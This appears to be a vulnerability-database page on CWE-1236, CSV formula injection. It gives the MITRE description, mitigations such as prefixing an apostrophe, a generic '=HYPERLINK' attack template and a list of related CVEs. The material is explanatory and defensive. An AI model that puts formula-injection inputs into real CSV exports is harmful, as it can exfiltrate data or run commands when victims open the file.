Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CWE-1236 — Vulnerability Class 128

128 vulnerabilities classified as CWE-1236. AI Chinese analysis included.

CWE-1236 represents a critical input validation weakness where applications fail to properly sanitize user-supplied data before writing it to Comma-Separated Values (CSV) files. This vulnerability is typically exploited by attackers injecting malicious formula elements, such as those starting with equals signs or plus signs, directly into the CSV content. When a victim opens the compromised file in a spreadsheet application like Microsoft Excel, the software interprets these characters as executable commands rather than plain text, potentially triggering remote code execution, data exfiltration, or unauthorized actions. To mitigate this risk, developers must implement robust neutralization strategies, specifically prefixing dangerous characters with single quotes or escaping them appropriately during the serialization process. By ensuring that all user-generated content is treated strictly as data and not as executable instructions, organizations can effectively prevent formula injection attacks and maintain the integrity of their data exchange mechanisms.

MITRE CWE Description
The product saves user-provided information into a Comma-Separated Value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by a spreadsheet product.
Common Consequences (1)
ConfidentialityRead Application Data, Execute Unauthorized Code or Commands
Attackers can populate data fields which, when saved to a CSV file, may attempt information exfiltration or other malicious activity when automatically executed by the spreadsheet software. Note that current versions of Excel warn users of untrusted content.
Mitigations (3)
ImplementationWhen generating CSV output, ensure that formula-sensitive metacharacters are effectively escaped or removed from all data before storage in the resultant CSV. Risky characters include '=' (equal), '+' (plus), '-' (minus), and '@' (at).
Effectiveness: Moderate
ImplementationIf a field starts with a formula character, prepend it with a ' (single apostrophe), which prevents Excel from executing the formula.
Effectiveness: Moderate
Architecture and DesignCertain implementations of spreadsheet software might disallow formulas from executing if the file is untrusted, or if the file is not authored by the current user.
Effectiveness: Limited
Examples (1)
Hyperlinks or other commands can be executed when a cell begins with the formula identifier, '='
=HYPERLINK(link_location, [friendly_name])
Attack · Other
HYPERLINK(link_location, [friendly_name])
Good · Other
CVE IDTitleCVSSSeverityPublished
CVE-2025-7061 Intelbras InControl operador csv injection — InControl 2.7 Low2025-07-04
CVE-2025-1421 Formula injection in a CSV file in Proget MDM — Proget 6.5AIMediumAI2025-05-21
CVE-2025-4546 1Panel-dev MaxKB Knowledge Base Module csv injection — MaxKB 4.7 Medium2025-05-11
CVE-2024-55532 Apache Ranger: Improper Neutralization of Formula Elements in a CSV File — Apache Ranger 9.8 -2025-03-03
CVE-2025-1836 Incorta Edit Insight csv injection — Incorta 4.3 Medium2025-03-02
CVE-2024-45084 IBM Cognos Controller CSV injection — Cognos Controller 8.0 High2025-02-19
CVE-2024-47572 Fortinet FortiSOAR 安全漏洞 — FortiSOAR 8.3 Critical2025-01-14
CVE-2024-22063 ZTE ZENIC ONE R58 product has a CSV injection vulnerability — ZENIC ONE R58 7.6 High2024-12-30
CVE-2024-9102 phpLDAPadmin: Improper Neutralization of Formula Elements — phpLDAPadmin 8.8 -2024-12-19
CVE-2024-53260 Course Roster vulnerable to CSV Injection in Autolab — Autolab 6.8 Medium2024-11-27
CVE-2021-38963 IBM Aspera Console CSV injection — Aspera Console 8.0 High2024-09-24
CVE-2024-3232 Formula Injection Vulnerability — Tenable Identity Exposure 7.6 High2024-07-16
CVE-2024-27785 Fortinet FortiAIOps 安全漏洞 — FortiAIOps 5.1 Medium2024-07-09
CVE-2023-5527 Business Directory Plugin <= 6.4.3 - Authenticated (Author+) CSV Injection — Business Directory Plugin – Easy Listing Directories for WordPress 7.4 High2024-06-18
CVE-2023-5424 WS Form LITE <= 1.9.217 - Unauthenticated CSV Injection — WS Form LITE – Drag & Drop Contact Form Builder 4.7 Medium2024-06-07
CVE-2024-28764 IBM WebSphere Automation CSV injection — WebSphere Automation 6.5 Medium2024-05-01
CVE-2023-48709 iTop vulnerable to potential formula injection in Excel/CSV export file — iTop 8.0 High2024-04-15
CVE-2024-3214 Relevanssi – A Better Search <= 4.22.1 - Unauthenticated Second Order CSV Injection — Relevanssi Premium 5.8 Medium2024-04-09
CVE-2024-25007 Ericsson Network Manager - Improper Neutralization of Formula Elements Vulnerability — Ericsson Network Manager 7.1 High2024-04-04
CVE-2023-47534 Fortinet FortiClientEMS 安全漏洞 — FortiClientEMS 8.7 Critical2024-03-12
CVE-2024-28111 CSV Injection in exported history CSV files — canarytokens 6.5 Medium2024-03-06
CVE-2023-35899 IBM Cloud Pak for Automation CSV injection — Cloud Pak for Automation 7.0 High2024-03-05
CVE-2023-45597 AiLux imx6 安全漏洞 — imx6 bundle 5.9 Medium2024-03-05
CVE-2023-42004 IBM Security Guardium CSV injection — Security Guardium 8.0 High2023-11-28
CVE-2023-41798 WordPress Directorist Plugin <= 7.7.1 is vulnerable to CSV Injection — Directorist – WordPress Business Directory Plugin with Classified Ads Listings 5.1 Medium2023-11-07
CVE-2022-41616 WordPress Export Users Data CSV Plugin <= 2.1 is vulnerable to CSV Injection — Export Users Data CSV 7.6 High2023-11-07
CVE-2022-38702 WordPress WP CSV Exporter Plugin <= 2.0 is vulnerable to CSV Injection — WP CSV Exporter 5.8 Medium2023-11-07
CVE-2022-42882 WordPress Simple CSV/XLS Exporter Plugin <= 1.5.8 is vulnerable to CSV Injection — Simple CSV/XLS Exporter 5.8 Medium2023-11-07
CVE-2022-44738 WordPress Posts and Users Stats Plugin <= 1.1.3 is vulnerable to CSV Injection — Posts and Users Stats 5.8 Medium2023-11-07
CVE-2022-45078 WordPress User Blocker Plugin <= 1.5.5 is vulnerable to CSV Injection — User Blocker 5.9 Medium2023-11-07

Vulnerabilities classified as CWE-1236 represent 128 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.